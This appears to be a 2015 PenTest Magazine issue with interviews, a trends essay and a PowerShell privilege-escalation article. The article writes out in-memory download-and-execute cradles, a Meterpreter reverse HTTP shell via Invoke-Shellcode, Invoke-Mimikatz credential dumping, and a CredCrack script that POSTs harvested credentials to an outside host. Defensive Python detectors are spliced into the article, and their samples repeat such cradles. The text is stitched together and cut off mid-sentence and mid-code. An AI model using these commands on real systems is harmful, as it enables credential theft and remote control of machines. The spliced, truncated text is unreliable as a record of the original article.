PenTest OPEN. Trends in 2016

December 20, 2016 | Author: claudiu | Category: N/A

ISSN 2084-1117, 11/2015

PENETRATION TESTING AND VULNERABILITY ANALYSIS

TRENDS IN 2016


INTERVIEW WITH KAI PFIESTER - FOUNDER OF BLACK CIPHER SECURITY
PRIVILEGE ESCALATION WITH POWERSHELL
IMPACT OF COMPLIANCE ON INFORMATION SECURITY
AND MORE...


Managing Editor: Anna Kondzierska
[email protected]

Betatesters & Proofreaders: Sushil Verma, Ayo Tayo Balogun, Pierre-E Bouchard, John Webb, Jay Kay, Tom Updegrove, Ivan Gutierrez Agramont, Matthew Sabin, Amit Chugh, Steven Wierckx, Daniel Dieterle, Craig Thornton, Clancey McNeal, Paul Oyola, David Kosorok, Andrea Consadori, Jarvis Simpson, Elia Pinto, Daniela C

Special thanks to the Beta testers and Proofreaders who helped with this issue. Without their assistance there would not be a PenTest Magazine.

Senior Consultant/Publisher: Pawel Marciniak
CEO: Joanna Kretowicz
[email protected]
DTP: Anna Kondzierska
Publisher: Hakin9 Media Sp. z o.o. SK
02-676 Warsaw, Poland
ul. Postepu 17D
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.


Contents

"I think it is a great space to be in right now and for the future" - interview with Kai Pfiester, founder of Black Cipher Security ... 5
Future of Pentesting and its trends for 2016 and beyond, by Jaro Nemcok & Ondrej Krehel ... 10
Privilege escalation with PowerShell, by Jonathan H. Broche ... 13
Security vs. compliance and the role of the penetration tester, by Joshua Gold ... 20
What issues might occur in outsourcing to an SI, by Jim Hart ... 24
Pentesting a true art form, by Martin Brough ... 27
"Think of security as a wheel and a never ending circle" - interview with Martin Voelk, CEO of Cyber 51 ... 29
The sword and the shield, by Tom Updegrove ... 32
Impact of compliance on information security, by Ayo Tayo Balogun ... 36

Dear PenTest Readers,

We would like to proudly present you the newest issue of PenTest Open, which is free to download for everyone interested in the topic. We hope that you will find many interesting articles inside the magazine and that you will have time to read all of them. We are really counting on your feedback here!

We are approaching the end of the year, so it is time to think about the future and the year 2016. In this issue we discuss the newest tools and trends that will probably play a big role in the coming months. You can read about privilege escalation with PowerShell and about Cobalt Strike. Have you ever thought about what issues may occur in outsourcing to an SI? You can read what Jim Hart has to say about it in one of the articles. There are also two interviews with CEOs of penetration testing companies. Our first interview is with Kai Pfiester, the founder of Black Cipher Security. We discussed the challenges of managing your own company and the state of the industry as it is today and in the days to come. The second interview is with Martin Voelk, the CEO of Cyber 51. We talked about his endeavours in making security better and more available. You can't miss it!

The main aim of this issue is to present our publication to a wider range of readers. We want to share the material we worked on and we hope we can meet your expectations. With a free account you have access to all the teasers and open issues, but we fully believe that you'd like to take this one step further and enjoy our publications without limits. Our premium subscription contains access to our whole archive. The virtual doors to our library are open for you!

We've already started preparing the next issue of PenTest, which is going to be about Cloud Pentesting. If there is a tool you would like to write about or you are a company which wants a professional product review, contact us!

We would also like to thank you for all your support. We appreciate it a lot. If you like this publication you can share it and tell your friends about it! Every comment means a lot to us. Again, special thanks to the Beta testers and Proofreaders who helped with this issue. Without your assistance there would not be a PenTest Magazine.

Enjoy your reading,
PenTest Magazine's Editorial Team

I think it is a great space to be in right now and for the future - interview with Kai Pfiester, founder of Black Cipher Security

KAI PFIESTER
Founder of Black Cipher Security. He holds numerous IT security certifications such as Certified Ethical Hacker, OSWP and Security+. As an author he has written articles on cyber security for the NJ Law Journal, NJ Business magazine, Burlington Regional Chamber of Commerce and several online publications. As a speaker, he has done presentations for the Phi Alpha Delta Law Fraternity International, NJ Society of CPAs, and several local business organizations. To contact Kai:
Phone: 609.284.6513
Email: [email protected]
Web: www.blackcipher.com

[PenTest Magazine]: Can you tell us something about yourself?

[Kai Pfiester]: I have been into IT since I first got introduced to the Apple IIe in middle school. Several years later, when I was about 10 years old, I saw the movie War Games and instantly knew I wanted to get into cyber security at some point. Then, in the mid-90s, I saw the movies Sneakers and Hackers, which really motivated me to get into the information security field. I started reading everything I could find, from old issues of Phrack to 2600 to online forums and technical manuals. But back then there wasn't as much information online as there is today.

[PT]: And now, when you are working in the field, did reality meet the expectations?

[KP]: Reality has definitely met my expectations. I love my job and feel I have found what I was born to do. I am a chess player and I love a good challenge that forces me to think outside the box. Penetration testing and cyber security are, in my humble opinion, some of the most challenging fields to work in, since they are so dynamic. It is a game of constantly moving targets.

[PT]: What convinced you to establish your own company?

[KP]: I decided to start my own IT security company around the time of the Target and Home Depot breaches. During that time period, it seemed like there was a new breach every other week or so. I came to the conclusion that cyber-attacks are only going to continue and only going to get worse. I enjoy helping people and love cyber security, so it was a natural fit for me.

[PT]: What kind of challenges did you face while creating your company?

[KP]: There were, and still are, many challenges in starting my own company. For starters, I thought I wouldn't have to really sell anything. With all the hacking and data breaches at the time, I sincerely believed that other businesses would come running to me for help. However, that was not the case, as most business owners that I encountered didn't think they were even worth a hacker's attention. So the primary challenge for me to this day is getting business owners to realize the need for an effective information security plan. The next big challenge for me was to deal with all the other aspects of running your own business, such as contracts, website design, marketing, business development, partnerships, taxes, etc., that come with being an entrepreneur. I am a technical person and so I had to learn all of the other stuff as I went along.

[PT]: Your company provides services for small and medium companies. Do you find more firms are becoming aware of cyber-attacks?

[KP]: Due to the media coverage, yes, more firms are becoming aware of the proliferation of cyber-attacks. However, they tend to still think that it won't happen to them or that they haven't been hacked yet. Most are not keeping and monitoring logs, so unless there is some blatant evidence of a breach, they have no way of knowing if they've been compromised or not.

[PT]: What do you think are the challenges for firms who are between small companies and major corporations?

[KP]: In my opinion the major challenge they face is deciding whether they need to outsource their IT security in order to keep costs down versus having their own in-house information security team. As we all know, if you have data and/or resources worth the attacker's attention, you will be targeted at some point.

[PT]: From your own experience, do you prefer to work with smaller or bigger companies?

[KP]: I prefer to work with smaller companies as there is less bureaucracy and you can get to the heart of the matter (securing their infrastructure) quickly.

[PT]: What are your general thoughts about the development of the cyber security market?

[KP]: I think it is a great space to be in right now and for the future. When you consider how IT is interwoven into almost every aspect of a person's daily life, it is easy to see how crucial IT security is and will be. From IoT to mobile apps to social media to corporate and government networks, the cyber security market is going to thrive well into the future.

[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be any breakthrough changes in technology?

[KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA encryption pretty quickly. Multi-factor authentication based on physical and/or behavioral traits seems to be the best approach to truly securing things. For instance, the banking industry is seriously considering using a person's heartbeat to authenticate before granting access to certain financial services.

[PT]: There seems to be a very strong push to get rid of passwords and replace them with more reliable solutions. What do you think about that? Is that a move in the right direction?

[KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs and video tapes were great when they first came out. They served their purpose well. But then came DVDs, and now we are streaming video directly to our screens. Passwords are in the same boat. With super-powerful GPU-based password cracking machines, freely available wordlists, rainbow tables, etc., many common passwords can be cracked within a week to ten days. If passwords are accompanied by some form of two-factor authentication, the account they are protecting is pretty safe. But I imagine it is only a matter of time before that obstacle is overcome.

[PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security specialists? Do you find it's going to be harder to find a job in this area?

[KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and staffing for cyber security. I imagine that there will be other sites like it and eventually there will be a clearing house, so to speak, where you can find the talent that you are looking for. As for finding a job in this area, no, I don't think it is going to be harder. You cannot go wrong by specializing in IT. You can almost always find a job. As for the cyber security market, if you have the skills, there will always be work, especially in the government sector.

[PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the near future?

[KP]: As cyber security product vendors make products better at detecting the subtlest attacks, attackers will be forced to evolve their attacks as well as their skillset. The human factor is always going to play a part, since humans are the ones that can make the greatest security technology in the world completely useless by not configuring it correctly or by being social-engineered into turning it off. Leveraging PowerShell in Windows is also a growing attack vector as it does not trip AV. So I imagine using a system's tools against itself will also play a part in the types of attacks we see a lot of in the future.

[PT]: Following the previous question, do you find the tools we have are good enough to ensure complete protection of a company?

[KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There is great security awareness training available for people, so that is covered. There are also highly effective data security technologies, as well as policies that govern how IT equipment and data should be handled. So what, then, is the problem? The problem is that rarely are all three of these factors implemented together into a solid cyber security defense strategy. When they are, a data breach is an extremely rare occurrence, if it ever is.

[PT]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in 2016?

[KP]: As more and more people get into the field we are going to see some really cool tools be developed. I also think we are going to see more "frameworks" like SET and Metasploit be released. When parents have only one child, that child has no one to learn from. Most of his or her knowledge comes from single-handed experience. But the next child born into the family not only learns from their own experience, but learns from the other child as well. So the second child's skillset develops faster than the first child's skillset. We have the same situation with pen testing and vulnerability analysis as well. These fields are young and the elders have set the stage with all their hard work and contributions. But I think the younger generation is going to improve and build upon the current foundation and develop tools that will be super effective in bypassing today's defense technologies.

[PT]: Do you have any thoughts or experiences you would like to share with our audience? Any good advice?

[KP]: Never be so arrogant that you think you are unhackable or not worth an attacker's time or attention. I once had a business lead at a certain company and, after talking to the company's IT guy, he basically told me that he had all the company's cyber security under control. At that point, I said OK and let it be. Six weeks later I got a call from him. He was in panic mode because his network had been hacked. They noticed more bandwidth than normal was being eaten up and tracked it to a specific server. Upon further investigation it had been hacked and turned into a spam server. After checking the timestamps on certain files, it was determined that his network was hacked prior to, and during, the time he told me that he had all the network's security under control and didn't need my help. True security requires humility and constant vigilance.


Future of pentesting and its trends for 2016 and beyond, by Jaro Nemcok & Ondrej Krehel

One prediction for 2016 is that it will be the year of Hacking the Code. Not the Da Vinci Code: computer code. This code contains vulnerabilities, and they are being exploited through its underlying integrations and connections to various enterprise-class systems.

The second prediction is that we will see more automation of cybersecurity and incident response. This follows from the notoriously error-prone nature of human beings, who, despite genuine talent, are the ones creating the automation and the digital world we know today. Penetration testing is already considered by many to be a "commodity" tactic.

To achieve the best results, a pentester needs to combine various strategies: leveraging top-notch automated tools, mixing manual and automated testing, writing their own tools for new technologies, solid knowledge of the systems under attack, scripting, social engineering, dark web spider intelligence, and more. Many popular penetration testing tools help testers produce polished reports that leave a great impression (and resonate well) with the client. Such tools combine online dark web data, the perimeter, systems, and application layers in one attractive report with its own scoring schema. Oftentimes, the driving force behind a penetration test is the need to comply with regulations rather than a genuine decision to improve security. The benefits of automated tools are great, and it is always a good idea to be equipped with the best tools available to automate as much of the work as possible. You could almost think of it as a scripted set of test attacks with payload parameters. This is where we see the industry going. The tools do not have to be commercial: there is great momentum in the open source community, including OWASP. Of course, even with more automation, there will still be a major difference in quality between the work of top penetration testers and an automated scan: a "vulnerability scan" does not equal a "pentest". The shift towards automation can, however, be a cost-efficient alternative for companies looking to save on basic penetration testing services, and a good way for penetration testers to save time and be more efficient.

One peculiar nightmare of automated tools is the ratio of false positives, followed by the ranking and interpretation of findings. Humans are still needed to properly categorize findings and eliminate false positives. The learning capabilities that tools provide are, however, still far from what the popular terms machine learning and artificial intelligence suggest.

As new tools and utilities are introduced to automate penetration testing tasks to a degree that would not have been possible just a few years ago, application complexity, technologies, and trends evolve exponentially with them. Although automation continues to be essential for pentesters, the challenges remain the same: every application is different, and tools depend heavily on user direction, since they cannot understand context and semantic meaning, have no intuition, and cannot improvise or adjust strategy. Pentesting strategies are now being converted from a one-shot-a-year exercise into annual programs, where secure code review, both static and dynamic, is combined with perhaps quarterly penetration tests of targeted areas. The financial sector, in particular, considers penetration testing an annual product rather than a one-time service. Professional firms use human intellect and tools to set up complete cybersecurity code exploitation and development practices with an emphasis on testing components. Effective penetration testing teams will consist of 3-5 highly trained professionals and specialists, executing the pentest assignment with well-rehearsed scrum efficacy: communication, division of tasks, re-prioritizing the backlog, tracking, addressing new issues, strategically re-focusing to maximize the value of both individual and team contributions, and committing to and owning the project from start to completion. Teams adopting lean methodologies would typically achieve at least double the velocity of isolated individual contributors of the same background.

New skillsets will be required in various emerging areas of penetration testing:

Mobile devices - iOS, Android, or Windows based native applications, as well as hybrid application assessment, will become more and more important as the use of mobile devices gradually shifts from entertainment to business use and the processing of financial and other sensitive data.

Cloud and virtualization - software-defined network technology is new and changing rapidly, and so is its threat landscape. This will require adjusting pentesting techniques at a matching speed.

Internet of things, embedded systems, pentesting/reverse engineering - office and home automation, vehicles, medical, payment, industrial control systems, switches, power converters, circuit breakers, and other devices are being connected to networks and therefore exposed to possible attacks; they will all need new and improved tools and approaches.

Ever evolving modern JavaScript based web applications - to assess the security of such applications there will be a need to combine classic crawling and scanning with a web browser engine, a JavaScript debugger, a forward/backward tracer, an unpacking/de-obfuscation snapshot comparer, script based state/variable alerting, injecting and fuzzing.

Wireless systems - software-defined radio (SDR) based wireless security assessments, WiFi, smart meters, wearable devices, etc.; all of this will require specific tools and skillsets.

Machine learning - machine learning based anomaly detection will keep improving. Unfortunately, so do the counter-measures.

Internal network pentesting - will be used more as companies realize that penetrating their internal networks using social engineering is a real possibility.

Social engineering - as a part of pentesting, in the foreseeable future, we do not see a possibility that an automated robot can get to a company building and ask somebody to "print his resume" from a USB drive.

**Legacy systems** - a remnant of an older Zeitgeist, the plethora of well-humming but rather dated production deployments out there is a great example of the need for a pentester. These systems will continue to require pentesting, which will not deviate greatly from currently-proven methodologies, and a skilled pentester is crucial for those precise military sniper missions.

We do believe that in the near future and beyond (at least until the time when applications are fully developed and auto-improved by autonomous artificially intelligent agents), it will still be human genius and intelligence, in-depth understanding, and efficient utilization of automated tools that determine the most successful pentesting outcomes. Terminator is an interesting concept and movie; only time will show how far artificial intelligence will get and whether human genius will replace itself with fully automated systems. Do not forget that, in the present day, it is the human hacking skillset that has so far won the race against machines.

About the authors:

JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and digital forensics firm. He started his career in software development with a focus on security and later moved to Information Security, focusing on system audits, security/risk assessments, penetration testing, incident response to hacked web applications, and overall security. He has almost two decades of cybersecurity experience, including vulnerability assessment, secure code review, cloud-based penetration testing, digital risk assessment, digital evidence acquisition, investigation of web attacks, security assessments of Internet-facing applications, penetration tests across internal networks, development of testing scripts and procedures, and digital forensics. Jaro worked on many high-profile cases, including a much publicized Box.com and Dropbox leakage.

ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital forensics firm. With over two decades of experience in computer security and forensics, he has conducted a wide range of investigations, including data breached through computer intrusions, theft of intellectual property, massive deletions, defragmentation, file carving, anti-money laundering, financial fraud, mathematical modeling and computer hacking. Ondrej's experience also includes advanced network penetration testing, database security testing, physical security assessments, logical security audits, wireless network penetration testing, and providing recommendations for the operational efficiency of approaches. He is one of the few security experts in the world holding the Certified Ethical Hacker Instructor Certification (CEI). Ondrej worked on many high-profile cases, including a much publicized

Privilege escalation with PowerShell, by Jonathan H. Broche

Privilege escalation is a task that proves difficult at times. In the past, one would rely heavily on Metasploit as the full exploitation suite. With Metasploit, one could not only exploit a vulnerability but also quickly elevate privileges with the getsystem command. However, with the cybersecurity landscape constantly changing, it was only a matter of time before network administrators adopted new technology that detects and prevents most Metasploit payloads. With one of pentesters' favorite tools now being detected, pentesters needed to find an alternative solution.

Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer required; an era where one can execute shellcode or obtain credentials in the clear without touching the file system. Welcome to the era of pentesting with PowerShell. This article aims to provide a technical introduction to using PowerShell to quickly escalate privileges on Windows operating systems.

THE WORLD OF POWERSHELL

Since its release in November of 2006 (https://en.wikipedia.org/wiki/Windows_PowerShell), PowerShell has made the jobs of many Windows administrators easier. With its array of methods and functionality, PowerShell is much more powerful and diverse than its predecessor, the command prompt. Despite PowerShell's diverse functionality, however, there is one method that catches the eye of pentesters: the DownloadString method. DownloadString is present in PowerShell version 2.0 and later. When used, it downloads the contents of a web page into a string. If the downloaded string happens to be a PowerShell script, it can then be executed. The best part? The execution runs in memory, thus bypassing most security products and PowerShell's script execution policy.

To demonstrate the DownloadString functionality, I created a simple PowerShell script named ipconfig.ps1 and ran it on a fully patched Windows 10 operating system. The ipconfig.ps1 script identifies the version of PowerShell running and runs ipconfig.

Table 1: ipconfig.ps1 script contents

$ver = $PSVersionTable.PSVersion.Major
"You are using PowerShell version " + $ver
ipconfig

There is an error when the script is run locally, since PowerShell's execution policy is set to Restricted, meaning that no PowerShell scripts can be run.

Figure 1: PowerShell execution error

However, if the script is uploaded to a web server and DownloadString is used, PowerShell's execution policy is bypassed.

Table 2: Example of PowerShell's DownloadString functionality

PS > IEX (New-Object Net.WebClient).DownloadString("http://gojhonny.com/pentestmag/ipconfig.ps1")


Figure 2: PowerShell DownloadString downloading and executing the ipconfig.ps1 script

Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts are Invoke-Shellcode and Invoke-Mimikatz. Both may be found on Matt Graeber's GitHub (https://github.com/mattifestation).
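A defender-side counterpart to the DownloadString pattern shown above, as an added example that is not part of the article: a small scanner over PowerShell script-block text (the kind of lines script block logging records) that flags a download primitive paired with an execution primitive, or one of the script names the article mentions. The sample blocks are constructed and the keyword lists are assumptions for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Keyword lists are assumptions for this example, not a vendor rule set.
# Primitives that pull content from the network into the session.
DOWNLOAD_KEYWORDS = ("downloadstring", "downloadfile", "downloaddata",
                     "invoke-webrequest", "invoke-restmethod", "iwr", "irm")
# Primitives that run a string as code; paired with a download they form a cradle.
EXECUTE_KEYWORDS = ("iex", "invoke-expression")
# Script names quoted in the article; seeing them at all is high severity.
TOOL_KEYWORDS = ("invoke-mimikatz", "invoke-shellcode")
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str        # "high" (cradle or known tool) or "medium" (download only)
    reasons: List[str]   # e.g. "download:downloadstring", "execute:iex"
    urls: List[str]      # every http(s) URL seen in the block, for blocking/triage


def normalize(text: str) -> str:
    """Canonicalise a script block before matching: drop PowerShell's backtick
    escape character, collapse whitespace, and ignore case."""
    text = text.replace("`", "")
    text = re.sub(r"\s+", " ", text)
    return text.lower().strip()


def _hits(keywords, text: str) -> List[str]:
    # Whole-word matches only, so "irm" does not fire inside "firmware".
    return [k for k in keywords if re.search(r"\b" + re.escape(k) + r"\b", text)]


def analyse_script_block(line_no: int, text: str) -> Optional[Finding]:
    """Return a Finding if the block looks like a download cradle, else None."""
    n = normalize(text)
    downloads = _hits(DOWNLOAD_KEYWORDS, n)
    executes = _hits(EXECUTE_KEYWORDS, n)
    tools = _hits(TOOL_KEYWORDS, n)
    reasons = ([f"download:{k}" for k in downloads]
               + [f"execute:{k}" for k in executes]
               + [f"tool:{k}" for k in tools])
    urls = URL_RE.findall(text.replace("`", ""))
    if tools or (downloads and executes):
        return Finding(line_no, "high", reasons, urls)
    if downloads:
        return Finding(line_no, "medium", reasons, urls)
    return None


def scan_script_blocks(blocks: List[str]) -> List[Finding]:
    """Scan a sequence of script-block texts (one per logged event)."""
    findings = []
    for i, text in enumerate(blocks, start=1):
        finding = analyse_script_block(i, text)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample script blocks, modelled on what script block logging
# records; 192.0.2.10 is a documentation address, not a real server.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-Process | Where-Object { $_.CPU -gt 100 }",
    'IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.10/ipconfig.ps1")',
    "iex (new-object net.webclient).downloadstring('http://192.0.2.10/Invoke-Mimikatz.ps1'); "
    "Invoke-Mimikatz -DumpCreds",
    "(New-Object Net.WebClient).DownloadFile('http://192.0.2.10/tool.zip', 'C:\\Temp\\tool.zip')",
    "Invoke-WebRequest -Uri http://192.0.2.10/payload.ps1 | Invoke-Expression",
]

if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.line_no}: {f.severity:6} {', '.join(f.reasons)} {f.urls}")
```

PowerShell's execution policy is a safety feature rather than a security boundary, which is why the cradle in Table 2 runs at all and why logging and detecting the cradle itself is the control to rely on.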

INVOKING SHELLCODE IN MEMORY

The Invoke-Shellcode script allows pentesters to execute custom shellcode or payloads such as Metasploit's reverse HTTP. The example below depicts the use of the DownloadString method to bypass security restrictions and execute a Metasploit reverse HTTP payload in memory. The Invoke-Shellcode script was placed on a local web server with the IP 192.168.146.132.

Table 3: Example of PowerShell DownloadString Invoke-Shellcode command

PS > IEX (New-Object Net.WebClient).DownloadString("http:///InvokeShellcode.ps1")
PS > Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost -Lport

Figure 3: PowerShell DownloadString downloading and executing the Invoke-Shellcode script

After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.


Figure 4: Reverse HTTP shell obtained by using the Invoke-Shellcode script


OBTAINING CACHED CREDENTIALS IN MEMORY

The Invoke-Mimikatz script is a port of Benjamin Delpy's Mimikatz created by Joseph Bialek. Mimikatz assists pentesters by obtaining and outputting cached credentials in clear text. Again, the example below shows sample usage of the Invoke-Mimikatz script using the DownloadString method.

Table 4: Example of PowerShell DownloadString Invoke-Mimikatz command

PS > IEX (New-Object Net.WebClient).DownloadString("http:///InvokeMimikatz.ps1")
PS > Invoke-Mimikatz -DumpCreds

Figure 5: Execution of Mimikatz in memory with PowerShell DownloadString

The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.

AUTOMATING PRIVILEGE ESCALATION WITH CREDCRACK

Pentesters love automation; in fact, we love automating as many things as possible. Thankfully, tools have been created to automate exploitation and privilege escalation and make the lives of pentesters easier. With great tools such as Empire, PowerUp and CredCrack, one may go from domain user to domain administrator in seconds. The following section will demonstrate how to use CredCrack, a popular credential harvesting script. CredCrack was created and released by myself, Jonathan Broche, in August of 2015 (http://blog.gojohnny.com/201508/domain-administrator-in-17-seconds.html). Since then, it has become a popular tool amongst pentesters and with the online community. CredCrack has two main functionalities: share enumeration and credential harvesting.

Table 5: CredCrack's help menu

usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es] [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples:
  ./credcrack.py -d acme -u bob -f hosts -es
  ./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Once domain user credentials have been compromised, it is recommended to use CredCrack's share enumeration functionality to identify the systems the compromised user has administrative access to. The share enumeration functionality uses the SMB protocol to test shares for write access on the systems provided. Systems that grant read/write access to their administrative share ("C$") indicate that the user has local administrative access.

Figure 6: Enumerating share access with CredCrack

After using the share enumeration functionality, the pentester would create a list of systems with administrative access and feed them into CredCrack's credential harvesting functionality.
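A defender-side way to spot the share sweep described above, as an added example that is not part of the article or of CredCrack: it groups administrative-share opens (C$, ADMIN$) by account and alerts when one account reaches many distinct hosts inside a short sliding window, which is the footprint the enumeration step leaves in share-access logs. The record layout, threshold and window are assumptions, and the records are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Shares whose successful access implies local administrator rights on the target.
ADMIN_SHARES = {"C$", "ADMIN$"}


@dataclass(frozen=True)
class ShareAccess:
    ts: datetime
    account: str      # DOMAIN\user, lower-cased
    src_ip: str       # where the SMB session came from
    target_host: str  # host whose share was opened
    share: str        # share name, upper-cased


@dataclass
class SweepAlert:
    account: str
    src_ips: List[str]
    hosts: List[str]
    first_seen: datetime
    last_seen: datetime


def parse_line(line: str) -> ShareAccess:
    """Parse one constructed record: '<iso-time> <account> <src-ip> <host> <share>'.
    (The field layout is an assumption for this example, not a product format.)"""
    ts, account, src_ip, host, share = line.split()
    return ShareAccess(datetime.fromisoformat(ts), account.lower(), src_ip,
                       host.upper(), share.upper())


def detect_admin_share_sweeps(events: List[ShareAccess], min_hosts: int = 5,
                              window: timedelta = timedelta(seconds=60)) -> List[SweepAlert]:
    """Alert when one account opens an administrative share on at least
    min_hosts distinct targets inside any sliding window of length `window`.
    Repeated access to a single host is not a sweep and is ignored."""
    by_account: Dict[str, List[ShareAccess]] = defaultdict(list)
    for e in events:
        if e.share in ADMIN_SHARES:
            by_account[e.account].append(e)

    alerts: List[SweepAlert] = []
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end].ts - evs[start].ts > window:
                start += 1
            hosts = {e.target_host for e in evs[start:end + 1]}
            if len(hosts) < min_hosts:
                continue
            # Threshold crossed: extend to the end of this window so the alert
            # lists every host touched, then report once per account.
            last = end
            while last + 1 < len(evs) and evs[last + 1].ts - evs[start].ts <= window:
                last += 1
            span = evs[start:last + 1]
            alerts.append(SweepAlert(
                account=account,
                src_ips=sorted({e.src_ip for e in span}),
                hosts=sorted({e.target_host for e in span}),
                first_seen=span[0].ts,
                last_seen=span[-1].ts,
            ))
            break
    return alerts


# Constructed sample records (RFC 5737 addresses, fictional hosts and accounts).
SAMPLE_LINES = (
    # acme\bob: one source opens C$ on 12 workstations in 12 seconds -> sweep
    [f"2015-11-05T10:00:{i:02d} acme\\bob 192.0.2.5 WS{i:02d} C$" for i in range(1, 13)]
    # acme\alice: two admin-share opens an hour apart -> normal admin work
    + ["2015-11-05T09:00:00 acme\\alice 192.0.2.7 FS01 C$",
       "2015-11-05T10:00:00 acme\\alice 192.0.2.7 FS02 ADMIN$"]
    # acme\carol: hammers C$ on one host only -> not a sweep
    + [f"2015-11-05T10:05:{i:02d} acme\\carol 192.0.2.9 FS01 C$" for i in range(6)]
    # acme\svc_backup: many IPC$ opens, not an administrative share -> ignored
    + [f"2015-11-05T10:10:{i:02d} acme\\svc_backup 192.0.2.20 WS{i:02d} IPC$" for i in range(1, 9)]
)


def run_sample() -> List[SweepAlert]:
    return detect_admin_share_sweeps([parse_line(l) for l in SAMPLE_LINES])


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.account}: {len(a.hosts)} hosts from {a.src_ips} "
              f"between {a.first_seen:%H:%M:%S} and {a.last_seen:%H:%M:%S}")
```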


CredCrack's credential harvesting works by executing the Invoke-Mimikatz script, using PowerShell's DownloadString method, against the provided systems. Victims execute Invoke-Mimikatz and send the credentials back to the pentester's system in an HTTP POST request.

Figure 7: Illustration of CredCrack sending Invoke-Mimikatz to victim systems

Below is the initial PowerShell script victims will be executing:

Table 6: PowerShell script CredCrack will execute on victims

IEX (New-Object Net.WebClient).DownloadString('http:///InvokeMimikatz.ps1');
$creds = Invoke-Mimikatz -DumpCreds;
$request = [System.Net.WebRequest]::Create('http:///creds.php');
$request.Method = "POST";
$request.ContentType = "application/x-www-form-urlencoded";
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();

Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials in a POST request to the pentester's system.

Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester

After all victims have finished the execution of Mimikatz, CredCrack will search for any matches against the domain administrator's list to see if a domain administrator account was obtained and, if so, output the account’s credentials.
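From the defender's side, the two steps just described leave distinctive traces: the share enumeration shows up as one account touching the C$ (or ADMIN$) administrative share on many hosts within seconds (Windows event 5140), and the harvesting stage shows up in PowerShell script block logging (event 4104) as an IEX/DownloadString cradle followed by Invoke-Mimikatz and an outbound POST. The Python below is an added example written for this edit, not CredCrack code and not from the article; the event records are constructed, 192.0.2.10 is a placeholder address, and the thresholds (five hosts inside five minutes) are assumptions to tune for a given environment.

```python
"""Defender-side checks for the two CredCrack behaviours described in the
article: an account touching the C$ administrative share on many hosts in a
short window, and a PowerShell script block that downloads Invoke-Mimikatz
and POSTs its output.  Added example; the events below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample events (not real telemetry).  Event 5140 records a
# network share access (ShareName field); event 4104 is a PowerShell script
# block log entry.  192.0.2.10 is a documentation-range placeholder address.
CRADLE = ("IEX (New-Object Net.WebClient).DownloadString("
          "'http://192.0.2.10/Invoke-Mimikatz.ps1'); "
          "$creds = Invoke-Mimikatz -DumpCreds; "
          "$request = [System.Net.WebRequest]::Create('http://192.0.2.10/creds.php'); "
          "$request.Method = \"POST\"")
SAMPLE_EVENTS = [
    {"ts": "2015-11-02T10:00:01", "id": 5140, "host": "WS01", "user": "ACME\\bob", "share": "\\\\*\\C$"},
    {"ts": "2015-11-02T10:00:01", "id": 5140, "host": "WS02", "user": "ACME\\bob", "share": "\\\\*\\C$"},
    {"ts": "2015-11-02T10:00:02", "id": 5140, "host": "WS03", "user": "ACME\\bob", "share": "\\\\*\\C$"},
    {"ts": "2015-11-02T10:00:02", "id": 5140, "host": "WS04", "user": "ACME\\bob", "share": "\\\\*\\ADMIN$"},
    {"ts": "2015-11-02T10:00:03", "id": 5140, "host": "WS05", "user": "ACME\\bob", "share": "\\\\*\\C$"},
    {"ts": "2015-11-02T10:00:04", "id": 5140, "host": "WS06", "user": "ACME\\bob", "share": "\\\\*\\C$"},
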